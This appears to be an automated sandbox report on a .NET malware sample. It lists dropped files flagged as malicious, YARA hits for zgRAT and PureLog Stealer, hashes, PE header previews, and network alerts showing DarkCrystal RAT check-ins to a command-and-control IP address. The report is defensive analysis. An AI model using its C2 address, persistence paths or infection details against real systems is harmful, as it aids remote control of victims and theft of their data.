                                                        MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                        SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                        SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                        SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\yHtdVhrW.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):23552
                                                        Entropy (8bit):5.529329139831718
                                                        Encrypted:false
                                                        SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                        MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                        SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                        SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                        SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\yimcMvrd.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):342528
                                                        Entropy (8bit):6.170134230759619
                                                        Encrypted:false
                                                        SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                        MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                        SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                        SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                        SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\zLWUHZHy.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34304
                                                        Entropy (8bit):5.618776214605176
                                                        Encrypted:false
                                                        SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                        MD5:9B25959D6CD6097C0EF36D2496876249
                                                        SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                        SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                        SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\zYgEJQlz.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):126976
                                                        Entropy (8bit):6.057993947082715
                                                        Encrypted:false
                                                        SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                        MD5:16B480082780CC1D8C23FB05468F64E7
                                                        SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                        SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                        SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                        C:\Users\user\Desktop\zaBVcLCP.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33792
                                                        Entropy (8bit):5.541771649974822
                                                        Encrypted:false
                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\zldVQLHr.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):23552
                                                        Entropy (8bit):5.529329139831718
                                                        Encrypted:false
                                                        SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                        MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                        SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                        SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                        SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\zmLFdDgP.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34304
                                                        Entropy (8bit):5.618776214605176
                                                        Encrypted:false
                                                        SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                        MD5:9B25959D6CD6097C0EF36D2496876249
                                                        SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                        SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                        SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Windows\SchCache\66fc9ff0ee96c2

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:ASCII text, with very long lines (759), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):759
                                                        Entropy (8bit):5.903083016999134
                                                        Encrypted:false
                                                        SSDEEP:12:DjhV9y+XOzNYZNduhCSbULdMWipDt4jtSUp/DlkgBX7c108V6E3:BV9rm8Puk7+vpqZx8gBr1E3
                                                        MD5:6C98CA35DCA8610BB6244CADF78009B4
                                                        SHA1:4CB957748D579A0F629BA3504763B5711BB51403
                                                        SHA-256:E434FE179A2EB5C6A71CC609291C18EAE3C94D3E0F157B12059BC8D03A5168F5
                                                        SHA-512:C1DFEDA29A45A5638F863D8A2599491839E9A52A38B48E862FF94E16DA42D7EE12DCC7F70B37732910031E410B73F86C803F9F8126C9D5DD9CCA8DB704A3C516
                                                        Malicious:false
                                                        Preview:iioHI94uPgh8tOPL1aP8Kh4LeCERpSGrXmsTWRxilVa0Xol5G7EzZikAocmF4nF7Z0lGf5zjmrXzGEy0bILsNRSyCsp4osn8PdahDeaKHeMsLu3kowowbXtIiwDxQ544EZjnnQw7sAksEjmSzFP2E1g2tR9Ran4MkRnwKP6X9qDbxBE8Jv7LpC0M2r3WRfgFGXIw60IjI12XxEFsNBHppthhba3dWkGeK7VZ2RCTnYCxJdZylLIQY0aWzkVf6oNivYNztp069yCQqtY7BF1Kb0FTh8kR5hW8LeCvQjE5VMQjyJpGMXd0wCG4S3SvFiAcbEFMqmrbB6zPjffXSdEhDgLJYIcWRSzwLyIuEdZjqBz0M0UwY4dmdcY425yiKVJsGDEuXvSzEf1BrV6hxq8XzNTsaN1Jo0ZU1GtJwkZnmoh8lWNh9QvdXw33tVUJ3JKNFgJllxvMRUuLpUHDATKYF67FM0ZbPQtceU3EMm6LfiMCBsNZNRIj9vIJiEYuXU7BkSrVbD0YX82gt5DenAN8HJdsMufINLyLlLbtB27KauMA3lZnB4HXG83ay9JrisKLJr5idTdvCDhX7cylU1GTEbEmRA5BtQmsjB1Lp1JraWUDbgdVKiWql1GsmTQdYbBwazx6ln5dsY2sGBKvhj1K35Hs4IjVkqT9Uimmshtgm38M8YlkIf6yj12erFCdDj3BF3XiZiC90ViA74ufg8NEufZdqH4neQcCA6HEBDLjd67OS1hwVh6FWyR

                                                        C:\Windows\SchCache\sihost.exe

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3923968
                                                        Entropy (8bit):7.839804583223067
                                                        Encrypted:false
                                                        SSDEEP:49152:zh3Lmrp7Qvsdng2u6ydyscQVnzrVGU14AyH9XsBgkpFvyA1nSiF:zhC54An5pydy/QVnv4K0HxAJzqA1SiF
                                                        MD5:832D64C5F330BE9505301104FCFC574A
                                                        SHA1:DE70A17B5E6F2186BB611E9BFACDCFE6B4FD9ED2
                                                        SHA-256:29472C5E2C502ED00E6E34E4C8EF71BE0E94A0971F548DF68689AAF23B8F1064
                                                        SHA-512:DE814A248871D7902E79E98C04DD1ADD6EA7C370EEA47BBF278CB433D0F0F7E201479DCD312A4FFB6AD94CE5C15F07FF17D4D156472B26EF2EE3C3A26BE87C4E
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\SchCache\sihost.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\SchCache\sihost.exe, Author: Joe Security
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................;.........N.;.. ....<...@.. .......................@<...........@...................................;.K.....<.p.................... <...................................................... ............... ..H............text...T.;.. ....;................. ..`.rsrc...p.....<.......;.............@....reloc....... <.......;.............@..B................0.;.....H..................o.........1.z.;......................................0..........(.... ........8........E........*...N.......8....*(.... ....~w...{t...:....& ....8....(.... ....~w...{r...9....& ....8....(.... ....~w...{....:....& ....8y......0..)....... ........8........E................>...........8....~....9.... ....~w...{....9....& ....8.......... ....8....~....(N... .... .... ....s....~....(R....... ....~w...{....:e...& ....8Z...8*... ....~w...{....:A...& ....86...r...

                                                        C:\Windows\SchCache\sihost.exe:Zone.Identifier

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:false
                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                        \Device\Null

                                                        Download File
                                                        Process:C:\Windows\System32\w32tm.exe
                                                        File Type:ASCII text
                                                        Category:dropped
                                                        Size (bytes):151
                                                        Entropy (8bit):4.843929587867158
                                                        Encrypted:false
                                                        SSDEEP:3:VLV993J+miJWEoJ8FXyUUTXaNvo5WTAnNvj:Vx993DEUEIFuAx
                                                        MD5:21C1AC635094DEA8F215684C95D892BD
                                                        SHA1:F010D20E1DD7EAB97E2F1BAB1C38A9C8CC10B0D7
                                                        SHA-256:FC444AD30B2D80919071E4B1AE025DA7382F6ADC1EC574CED58B9A1E4655E7D2
                                                        SHA-512:89B1FA72D8FA201EB468658856C28B8139122D4C602B6168BDE4297BDB4FAFE715A12C922E0EE331B6B5787525F26AEC2D0999E0F047A1ECAD6A27BC05B10191
                                                        Malicious:false
                                                        Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 02/11/2024 14:36:09..14:36:09, error: 0x80072746.14:36:14, error: 0x80072746.

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):7.839804583223067
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Windows Screen Saver (13104/52) 0.07%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        File name:teh76E2k50.exe
                                                        File size:3'923'968 bytes
                                                        MD5:832d64c5f330be9505301104fcfc574a
                                                        SHA1:de70a17b5e6f2186bb611e9bfacdcfe6b4fd9ed2
                                                        SHA256:29472c5e2c502ed00e6e34e4c8ef71be0e94a0971f548df68689aaf23b8f1064
                                                        SHA512:de814a248871d7902e79e98c04dd1add6ea7c370eea47bbf278cb433d0f0f7e201479dcd312a4ffb6ad94ce5c15f07ff17d4d156472b26ef2ee3c3a26be87c4e
                                                        SSDEEP:49152:zh3Lmrp7Qvsdng2u6ydyscQVnzrVGU14AyH9XsBgkpFvyA1nSiF:zhC54An5pydy/QVnv4K0HxAJzqA1SiF
                                                        TLSH:FA06F10695554E73C2E87FB084DB046D57F0C6227663EB1B761F10D1A82A2B4BF622FB
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................;.........N.;.. ....<...@.. .......................@<...........@................................

                                                        File Icon

                                                        Icon Hash:00928e8e8686b000

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x7bf74e
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x6507AC75 [Mon Sep 18 01:48:37 2023 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x3bf7000x4b.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c00000x370.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x3c20000xc.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x20000x3bd7540x3bd800ae4265524ab022783d5efd633ad9e5d1unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rsrc0x3c00000x3700x4000b2e8d91fbadce7b4cf5978b57d5f2f9False0.3759765625data2.854832632722979IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .reloc0x3c20000xc0x2009c5ce71a517dd5a925092a8ff2eb4d0fFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_VERSION0x3c00580x318data0.44823232323232326

                                                        Imports

                                                        DLLImport
                                                        mscoree.dll_CorExeMain

                                                        Network Behavior

                                                        Suricata IDS Alerts

                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-11-02T17:47:40.982112+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.549782TCP
                                                        2024-11-02T17:47:48.403181+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.549829194.135.20.480TCP
                                                        2024-11-02T17:48:03.731878+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.549909194.135.20.480TCP
                                                        2024-11-02T17:48:18.795771+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.549984TCP
                                                        2024-11-02T17:48:25.612187+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.549998194.135.20.480TCP
                                                        2024-11-02T17:48:35.409477+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.550000194.135.20.480TCP
                                                        2024-11-02T17:48:48.746972+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.550002194.135.20.480TCP
                                                        2024-11-02T17:48:58.684477+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.550004194.135.20.480TCP
                                                        2024-11-02T17:49:10.569070+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.550005194.135.20.480TCP
                                                        2024-11-02T17:49:23.997157+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.550008194.135.20.480TCP
                                                        2024-11-02T17:49:32.751139+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.550009194.135.20.480TCP
                                                        2024-11-02T17:49:45.710601+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.550011194.135.20.480TCP

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Nov 2, 2024 17:47:47.518305063 CET4982980192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:47:47.523293972 CET8049829194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:47:47.523403883 CET4982980192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:47:47.524085045 CET4982980192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:47:47.529140949 CET8049829194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:47:47.872826099 CET4982980192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:47:47.877640963 CET8049829194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:47:48.351445913 CET8049829194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:47:48.403181076 CET4982980192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:47:48.733808041 CET4982980192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:02.914899111 CET4990980192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:02.919858932 CET8049909194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:48:02.920037031 CET4990980192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:02.920274973 CET4990980192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:02.925086975 CET8049909194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:48:03.278435946 CET4990980192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:03.283358097 CET8049909194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:48:03.731477022 CET8049909194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:48:03.731488943 CET8049909194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:48:03.731878042 CET4990980192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:05.286855936 CET4990980192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:14.987602949 CET4996880192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:14.992889881 CET8049968194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:48:14.992984056 CET4996880192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:14.993206024 CET4996880192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:14.998008966 CET8049968194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:48:15.341116905 CET4996880192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:15.346095085 CET8049968194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:48:15.859442949 CET8049968194.135.20.4192.168.2.5
                                                        Nov 2, 2024 17:48:15.981338978 CET4996880192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:16.095413923 CET4996880192.168.2.5194.135.20.4
                                                        Nov 2, 2024 17:48:24.704694033 CET4999880192.168.2.5194.135.20.4
